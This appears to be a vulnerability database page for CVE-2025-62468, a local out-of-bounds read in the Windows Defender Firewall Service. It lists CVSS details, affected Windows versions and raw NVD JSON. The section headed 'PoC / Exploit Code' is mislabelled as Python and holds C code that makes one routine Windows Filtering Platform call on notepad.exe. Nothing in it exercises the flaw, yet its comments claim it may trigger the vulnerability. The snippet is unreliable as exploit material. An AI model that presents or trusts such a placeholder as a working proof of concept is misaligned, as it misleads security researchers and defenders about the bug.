Security Vulnerability Report
中文
CVE-2025-62468 CVSS 5.5 MEDIUM

CVE-2025-62468

Published: 2025-12-09 18:15:59
Last Modified: 2025-12-12 23:15:40

Description

Out-of-bounds read in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:* - VULNERABLE
Windows 10 多个版本
Windows 11 多个版本
Windows Server 2019
Windows Server 2022
Windows Defender Firewall Service 特定版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-62468 PoC - Windows Defender Firewall Service Out-of-Bounds Read // This is a conceptual proof-of-concept demonstrating the vulnerability // Requires local access to trigger the out-of-bounds read #include <windows.h> #include <fwpmu.h> #include <stdio.h> #pragma comment(lib, "fwpuclnt.lib") int main() { DWORD result; HANDLE engineHandle = NULL; // Open a session to the Windows Filtering Platform result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_WINNT, NULL, NULL, &engineHandle); if (result != ERROR_SUCCESS) { printf("Failed to open engine: %lu\n", result); return 1; } printf("[*] Engine opened successfully\n"); printf("[*] Attempting to trigger CVE-2025-62468...\n"); // Enumerate filters with specific conditions to trigger the vulnerability // The actual vulnerable code path involves improper boundary checking // when processing filter conditions in Windows Defender Firewall Service FWP_BYTE_BLOB* blob = NULL; // This call may trigger the out-of-bounds read if conditions are met result = FwpmGetAppIdFromFileName0(L"C:\\Windows\\System32\\notepad.exe", &blob); if (result == ERROR_SUCCESS && blob != NULL) { printf("[+] Successfully retrieved app ID blob\n"); printf("[*] Blob size: %u bytes\n", blob->size); // The vulnerability allows reading beyond allocated buffer // In a real exploit, attacker would monitor memory access patterns FwpmFreeMemory0((void**)&blob); } FwpmEngineClose0(engineHandle); printf("[*] Session closed\n"); printf("[*] Note: This PoC demonstrates the concept.\n"); printf("[*] Actual exploitation requires specific conditions.\n"); return 0; } /* Vulnerability Explanation: - The out-of-bounds read occurs in Windows Defender Firewall Service - When processing certain filter conditions or network objects - The service fails to properly validate array/buffer boundaries - This allows a local attacker to read adjacent memory regions Mitigation: - Apply Microsoft security updates for CVE-2025-62468 - Keep Windows Defender and firewall components updated - Implement least privilege principle for user accounts */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62468", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:58.893", "lastModified": "2025-12-12T23:15:39.610", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds read in Windows Defender Firewall Service allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6345", "matchCriteriaId": "6DCE32D0-A9E0-4029-AB35-5E202A42AF01"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7392", "matchCriteriaId": "8DCD2A6E-7CD0-4FCC-AC11-5A1470776C24"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7392", "matchCriteriaId": "8EA08CDD-D682-403D-8B50-879EB4D88C67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2025", "matchCriteriaId": "E9CE4A36-DA42-40CC-8724-E30A22CA84B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7392", "matchCriteriaId": "35BBEADA-D039-479B-A1BA-B2A7E37235BE"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62468", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}